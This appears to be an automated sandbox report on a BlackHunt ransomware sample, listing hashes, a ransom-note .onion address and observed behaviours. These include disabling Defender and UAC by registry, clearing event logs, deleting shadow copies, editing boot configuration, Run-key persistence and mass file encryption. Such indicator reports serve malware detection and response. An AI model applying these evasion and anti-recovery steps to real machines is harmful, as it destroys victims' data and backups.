Analysis
-
max time kernel
121s -
max time network
125s -
platform
windows7_x64 -
resource
win7-20231129-en -
resource tags
arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system -
submitted
18/01/2024, 22:29
Static task
static1
Behavioral task
behavioral1
Sample
0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe
Resource
win7-20231129-en
Behavioral task
behavioral2
Sample
0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe
Resource
win10v2004-20231215-en
General
-
Target
0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe
-
Size
707KB
-
MD5
4e903e9b097a09742b50c518bc787447
-
SHA1
1651074a1adfa8ae8b2d99f09de00861a2100f15
-
SHA256
0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df
-
SHA512
cf7b3e0cc4318491eaa97bebf634ce190a5568f85eb283ae1e8fac38b42ef7db5620d99a3006bc8a0db5408a406169a63df9db7027f79052ab4016a0340360d3
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1w8mvnh:6uaTmkZJ+naie5OTamgEoKxLWbYh
Malware Config
Extracted
C:\ProgramData\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 2 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 1244 fsutil.exe 584 fsutil.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe -
Clears Windows event logs 1 TTPs 5 IoCs
pid Process 2188 wevtutil.exe 1960 wevtutil.exe 1088 wevtutil.exe 2600 wevtutil.exe 2280 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
pid Process 1940 bcdedit.exe 3048 bcdedit.exe 2628 bcdedit.exe 1732 bcdedit.exe -
Renames multiple (2910) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 2180 wbadmin.exe 2912 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Deletes itself 1 IoCs
pid Process 2216 cmd.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe -
Enumerates connected drives 3 TTPs 27 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\U: 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File opened (read-only) \??\I: 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File opened (read-only) \??\K: 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File opened (read-only) \??\X: 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File opened (read-only) \??\L: 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File opened (read-only) \??\Z: 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\Y: 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File opened (read-only) \??\S: 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File opened (read-only) \??\N: 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File opened (read-only) \??\R: 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File opened (read-only) \??\A: 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File opened (read-only) \??\T: 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File opened (read-only) \??\P: 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File opened (read-only) \??\J: 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File opened (read-only) \??\B: 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File opened (read-only) \??\M: fsutil.exe File opened (read-only) \??\H: 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File opened (read-only) \??\F: fsutil.exe File opened (read-only) \??\G: 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File opened (read-only) \??\M: 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File opened (read-only) \??\F: fsutil.exe File opened (read-only) \??\Q: 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File opened (read-only) \??\W: 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File opened (read-only) \??\E: 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File opened (read-only) \??\O: 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File opened (read-only) \??\V: 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 2 ip-api.com -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\#BlackHunt_BG.jpg" 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files\VideoLAN\VLC\locale\uk\LC_MESSAGES\#BlackHunt_Private.key 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File opened for modification C:\Program Files\VideoLAN\VLC\New_Skins.url 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File created C:\Program Files\VideoLAN\VLC\plugins\visualization\#BlackHunt_ReadMe.txt 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\#BlackHunt_Private.key 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\olh001.htm 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File created C:\Program Files\VideoLAN\VLC\locale\pt_BR\#BlackHunt_ReadMe.hta 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\dropins\#BlackHunt_ReadMe.hta 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp.ja_5.5.0.165303\#BlackHunt_ReadMe.txt 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\META-INF\#BlackHunt_ReadMe.txt 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.artifact.repository.nl_zh_4.4.0.v20140623020002.jar 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-nodes.xml 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File opened for modification C:\Program Files\Java\jre7\lib\management\management.properties 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\photoedge_selectionsubpicture.png 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\ext\#BlackHunt_ReadMe.txt 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Kolkata 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Australia\Lindeman 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File created C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\106.0.5249.119\#BlackHunt_ReadMe.txt 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\fonts\LucidaBrightDemiBold.ttf 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\configuration\org.eclipse.update\#BlackHunt_Private.key 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File created C:\Program Files\MSBuild\#BlackHunt_Private.key 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File created C:\Program Files\VideoLAN\VLC\locale\nl\#BlackHunt_ReadMe.hta 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\META-INF\#BlackHunt_ReadMe.txt 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-modules-startup.xml 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File created C:\Program Files\VideoLAN\VLC\locale\pl\#BlackHunt_ReadMe.hta 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File created C:\Program Files\VideoLAN\VLC\locale\uz\#BlackHunt_Private.key 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\triggerConstraints.exsd 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Ust-Nera 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-autoupdate-services_zh_CN.jar 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-lib-profiler_ja.jar 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Sakhalin 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT-3 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File created C:\Program Files\VideoLAN\VLC\locale\ne\LC_MESSAGES\#BlackHunt_Private.key 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File opened for modification C:\Program Files\7-Zip\Lang\ast.txt 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\#BlackHunt_Private.key 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Indian\Christmas 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File created C:\Program Files\VideoLAN\VLC\locale\lt\LC_MESSAGES\#BlackHunt_ReadMe.hta 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\scrapbook.png 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\tools.jar 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.core.nl_ja_4.4.0.v20140623020002.jar 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\EST5EDT 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File created C:\Program Files\VideoLAN\VLC\plugins\text_renderer\#BlackHunt_Private.key 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Stacking\1047x576black.png 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\selection_subpicture.png 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.services.nl_zh_4.4.0.v20140623020002.jar 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File created C:\Program Files\VideoLAN\VLC\locale\sq\LC_MESSAGES\#BlackHunt_Private.key 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\Rio_Gallegos 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_basestyle.css 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File created C:\Program Files\VideoLAN\VLC\locale\ja\#BlackHunt_Private.key 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File opened for modification C:\Program Files\7-Zip\Lang\tt.txt 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_es.jar 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File created C:\Program Files\VideoLAN\VLC\locale\cy\#BlackHunt_ReadMe.hta 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File created C:\Program Files\VideoLAN\VLC\locale\eu\LC_MESSAGES\#BlackHunt_ReadMe.hta 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File created C:\Program Files\VideoLAN\VLC\locale\ky\LC_MESSAGES\#BlackHunt_ReadMe.txt 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File created C:\Program Files\VideoLAN\VLC\locale\si\#BlackHunt_ReadMe.hta 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File created C:\Program Files\VideoLAN\VLC\locale\vi\LC_MESSAGES\#BlackHunt_Private.key 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File created C:\Program Files\VideoLAN\VLC\lua\http\dialogs\#BlackHunt_Private.key 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\META-INF\#BlackHunt_ReadMe.hta 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File opened for modification C:\Program Files\Java\jre7\lib\cmm\GRAY.pf 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_default_gtk.css 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File created C:\Program Files\VideoLAN\VLC\locale\an\#BlackHunt_ReadMe.hta 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\SpecialOccasion\SpecialNavigationLeft_ButtonGraphic.png 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-io.xml 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File created C:\Program Files\VideoLAN\VLC\locale\ach\#BlackHunt_Private.key 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\ICU\#BlackHunt_ReadMe.txt 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1664 schtasks.exe -
Interacts with shadow copies 2 TTPs 6 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 2976 vssadmin.exe 600 vssadmin.exe 1764 vssadmin.exe 904 vssadmin.exe 2748 vssadmin.exe 2592 vssadmin.exe -
Kills process with taskkill 1 IoCs
pid Process 2776 taskkill.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Modifies registry class 8 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon conhost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" conhost.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon conhost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" conhost.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 1688 PING.EXE -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 2596 mshta.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeDebugPrivilege 2992 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe Token: SeRestorePrivilege 2992 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe Token: SeBackupPrivilege 2992 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe Token: SeTakeOwnershipPrivilege 2992 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe Token: SeAuditPrivilege 2992 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe Token: SeSecurityPrivilege 2992 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe Token: SeIncBasePriorityPrivilege 2992 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe Token: SeBackupPrivilege 1756 vssvc.exe Token: SeRestorePrivilege 1756 vssvc.exe Token: SeAuditPrivilege 1756 vssvc.exe Token: SeBackupPrivilege 1620 wbengine.exe Token: SeRestorePrivilege 1620 wbengine.exe Token: SeSecurityPrivilege 1620 wbengine.exe Token: SeSecurityPrivilege 1088 wevtutil.exe Token: SeBackupPrivilege 1088 wevtutil.exe Token: SeSecurityPrivilege 2600 wevtutil.exe Token: SeBackupPrivilege 2600 wevtutil.exe Token: SeSecurityPrivilege 1960 wevtutil.exe Token: SeBackupPrivilege 1960 wevtutil.exe Token: SeSecurityPrivilege 2188 wevtutil.exe Token: SeSecurityPrivilege 2280 wevtutil.exe Token: SeBackupPrivilege 2188 wevtutil.exe Token: SeBackupPrivilege 2280 wevtutil.exe Token: SeDebugPrivilege 2776 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2992 wrote to memory of 3016 2992 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe 154 PID 2992 wrote to memory of 3016 2992 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe 154 PID 2992 wrote to memory of 3016 2992 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe 154 PID 2992 wrote to memory of 3016 2992 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe 154 PID 2992 wrote to memory of 2576 2992 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe 153 PID 2992 wrote to memory of 2576 2992 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe 153 PID 2992 wrote to memory of 2576 2992 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe 153 PID 2992 wrote to memory of 2576 2992 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe 153 PID 2992 wrote to memory of 2608 2992 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe 151 PID 2992 wrote to memory of 2608 2992 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe 151 PID 2992 wrote to memory of 2608 2992 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe 151 PID 2992 wrote to memory of 2608 2992 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe 151 PID 3016 wrote to memory of 2680 3016 cmd.exe 149 PID 3016 wrote to memory of 2680 3016 cmd.exe 149 PID 3016 wrote to memory of 2680 3016 cmd.exe 149 PID 2992 wrote to memory of 2684 2992 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe 148 PID 2992 wrote to memory of 2684 2992 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe 148 PID 2992 wrote to memory of 2684 2992 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe 148 PID 2992 wrote to memory of 2684 2992 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe 148 PID 2992 wrote to memory of 2892 2992 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe 30 PID 2992 wrote to memory of 2892 2992 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe 30 PID 2992 wrote to memory of 2892 2992 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe 30 PID 2992 wrote to memory of 2892 2992 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe 30 PID 2992 wrote to memory of 2592 2992 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe 170 PID 2992 wrote to memory of 2592 2992 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe 170 PID 2992 wrote to memory of 2592 2992 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe 170 PID 2992 wrote to memory of 2592 2992 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe 170 PID 2576 wrote to memory of 3032 2576 cmd.exe 163 PID 2576 wrote to memory of 3032 2576 cmd.exe 163 PID 2576 wrote to memory of 3032 2576 cmd.exe 163 PID 2992 wrote to memory of 2780 2992 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe 142 PID 2992 wrote to memory of 2780 2992 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe 142 PID 2992 wrote to memory of 2780 2992 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe 142 PID 2992 wrote to memory of 2780 2992 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe 142 PID 2608 wrote to memory of 2584 2608 cmd.exe 143 PID 2608 wrote to memory of 2584 2608 cmd.exe 143 PID 2608 wrote to memory of 2584 2608 cmd.exe 143 PID 2992 wrote to memory of 2772 2992 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe 140 PID 2992 wrote to memory of 2772 2992 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe 140 PID 2992 wrote to memory of 2772 2992 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe 140 PID 2992 wrote to memory of 2772 2992 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe 140 PID 2992 wrote to memory of 2768 2992 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe 137 PID 2992 wrote to memory of 2768 2992 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe 137 PID 2992 wrote to memory of 2768 2992 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe 137 PID 2992 wrote to memory of 2768 2992 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe 137 PID 2684 wrote to memory of 2496 2684 cmd.exe 191 PID 2684 wrote to memory of 2496 2684 cmd.exe 191 PID 2684 wrote to memory of 2496 2684 cmd.exe 191 PID 2992 wrote to memory of 2508 2992 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe 183 PID 2992 wrote to memory of 2508 2992 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe 183 PID 2992 wrote to memory of 2508 2992 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe 183 PID 2992 wrote to memory of 2508 2992 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe 183 PID 2992 wrote to memory of 2640 2992 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe 134 PID 2992 wrote to memory of 2640 2992 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe 134 PID 2992 wrote to memory of 2640 2992 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe 134 PID 2992 wrote to memory of 2640 2992 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe 134 PID 2992 wrote to memory of 2468 2992 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe 132 PID 2992 wrote to memory of 2468 2992 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe 132 PID 2992 wrote to memory of 2468 2992 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe 132 PID 2992 wrote to memory of 2468 2992 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe 132 PID 2992 wrote to memory of 2540 2992 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe 129 PID 2992 wrote to memory of 2540 2992 0cec971c4cc9d141467afd854dac4ef239718d10a2fae1bbc791e17285cef0df.exe 129 PID 2992 wrote to memory of 2540 2992 